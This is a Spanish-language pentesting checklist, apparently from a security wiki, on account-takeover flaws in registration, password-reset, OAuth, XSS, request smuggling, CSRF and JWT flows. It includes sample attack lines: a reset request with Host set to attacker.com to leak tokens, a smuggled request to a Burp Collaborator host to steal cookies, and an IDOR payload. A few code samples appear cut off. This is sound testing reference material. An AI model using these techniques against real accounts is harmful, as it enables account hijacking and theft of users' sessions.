Registration & Takeover Vulnerabilities
WhiteIntel es un motor de búsqueda alimentado por la dark web que ofrece funcionalidades gratuitas para verificar si una empresa o sus clientes han sido comprometidos por malwares robadores.
El objetivo principal de WhiteIntel es combatir tomas de control de cuentas y ataques de ransomware resultantes de malwares que roban información.
Puedes visitar su sitio web y probar su motor de forma gratuita en:
Toma de Control de Registro
Registro Duplicado
Intenta generar usando un nombre de usuario existente
Verifica variando el correo electrónico:
mayúsculas
+1@
agregar algún punto en el correo electrónico
caracteres especiales en el nombre del correo electrónico (%00, %09, %20)
Coloca caracteres negros después del correo electrónico:
test@test.com a
victim@gmail.com@attacker.com
victim@attacker.com@gmail.com
Enumeración de Usuario
Verifica si puedes determinar si un nombre de usuario ya ha sido registrado dentro de la aplicación.
Política de Contraseña
Al crear un usuario, verifica la política de contraseñas (verifica si se pueden usar contraseñas débiles). En ese caso, puedes intentar fuerza bruta en las credenciales.
Inyección SQL
Consulta esta página para aprender cómo intentar tomas de control de cuentas o extraer información a través de Inyecciones SQL en formularios de registro.
Toma de Control de Oauth
pageOAuth to Account takeoverVulnerabilidades de SAML
pageSAML AttacksCambio de Correo Electrónico
Cuando estés registrado, intenta cambiar el correo electrónico y verifica si este cambio se valida correctamente o si se puede cambiar a correos electrónicos arbitrarios.
Más Verificaciones
Verifica si puedes usar correos electrónicos desechables
Una contraseña larga (>200) conduce a una Denegación de Servicio (DoS)
Verifica los límites de velocidad en la creación de cuentas
Utiliza username@burp_collab.net y analiza el callback
Toma de Control de Restablecimiento de Contraseña
Fuga de Token de Restablecimiento de Contraseña a través del Referente
Solicita restablecer la contraseña a tu dirección de correo electrónico
Haz clic en el enlace de restablecimiento de contraseña
No cambies la contraseña
Haz clic en cualquier sitio web de terceros (por ejemplo: Facebook, Twitter)
Intercepta la solicitud en el proxy de Burp Suite
Verifica si el encabezado referer está filtrando el token de restablecimiento de contraseña.
Envenenamiento de Restablecimiento de Contraseña
Intercepta la solicitud de restablecimiento de contraseña en Burp Suite
Agrega o edita los siguientes encabezados en Burp Suite:
Host: attacker.com
,X-Forwarded-Host: attacker.com
Reenvía la solicitud con el encabezado modificado
http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com
Busca una URL de restablecimiento de contraseña basada en el encabezado host como:
https://attacker.com/reset-password.php?token=TOKEN
Restablecimiento de Contraseña a través del Parámetro de Correo Electrónico
IDOR en Parámetros de API
El atacante debe iniciar sesión con su cuenta e ir a la función Cambiar contraseña.
Iniciar Burp Suite y interceptar la solicitud.
Enviarla a la pestaña de repetidor y editar los parámetros: ID de usuario/correo electrónico
powershell POST /api/changepass [...] ("form": {"email":"victima@email.com","password":"contraseñasegura"})
Token Débil de Restablecimiento de Contraseña
El token de restablecimiento de contraseña debe generarse aleatoriamente y ser único cada vez. Intenta determinar si el token expira o si siempre es el mismo, en algunos casos, el algoritmo de generación es débil y puede ser adivinado. Las siguientes variables podrían ser utilizadas por el algoritmo.
Marca de tiempo
ID de usuario
Correo electrónico del usuario
Nombre y apellido
Fecha de nacimiento
Criptografía
Solo números
Secuencia de token pequeña (caracteres entre [A-Z,a-z,0-9])
Reutilización de token
Fecha de vencimiento del token
Fuga de Token de Restablecimiento de Contraseña
Desencadena una solicitud de restablecimiento de contraseña utilizando la API/UI para un correo electrónico específico, por ejemplo: test@mail.com
Inspecciona la respuesta del servidor y busca
resetToken
Luego usa el token en una URL como
https://ejemplo.com/v3/usuario/contraseña/reset?resetToken=[EL_TOKEN_DE_RESTABLECIMIENTO]&correo=[EL_CORREO]
Restablecimiento de Contraseña a Través de Colisión de Nombre de Usuario
Regístrate en el sistema con un nombre de usuario idéntico al nombre de usuario de la víctima, pero con espacios en blanco insertados antes y/o después del nombre de usuario. por ejemplo:
"admin "
Solicita un restablecimiento de contraseña con tu nombre de usuario malicioso.
Utiliza el token enviado a tu correo electrónico y restablece la contraseña de la víctima.
Conéctate a la cuenta de la víctima con la nueva contraseña.
La plataforma CTFd era vulnerable a este ataque. Ver: CVE-2020-7245
Toma de Control de Cuenta a Través de Cross Site Scripting
Encuentra un XSS dentro de la aplicación o un subdominio si las cookies están limitadas al dominio principal:
*.dominio.com
Filtra la cookie de sesión actual
Autentícate como el usuario utilizando la cookie
Toma de Control de Cuenta a Través de HTTP Request Smuggling
Utiliza smuggler para detectar el tipo de HTTP Request Smuggling (CL, TE, CL.TE)
powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h
\Crea una solicitud que sobrescribirá el
POST / HTTP/1.1
con los siguientes datos:GET http://algo.burpcollaborator.net HTTP/1.1 X:
con el objetivo de redirigir a las víctimas a burpcollab y robar sus cookies\La solicitud final podría verse así:
Hackerone informa que explotó este error\
Toma de cuenta a través de CSRF
Crear un payload para CSRF, por ejemplo: "Formulario HTML con envío automático para cambio de contraseña"
Enviar el payload
Toma de cuenta a través de JWT
El Token JSON Web podría ser utilizado para autenticar a un usuario.
Editar el JWT con otro ID de usuario / Email
Verificar una firma JWT débil
Referencias
WhiteIntel es un motor de búsqueda alimentado por la dark web que ofrece funcionalidades gratuitas para verificar si una empresa o sus clientes han sido comprometidos por malwares de robo.
El objetivo principal de WhiteIntel es combatir las tomas de cuentas y los ataques de ransomware resultantes de malwares que roban información.
Puedes visitar su sitio web y probar su motor de forma gratuita en:
Última actualización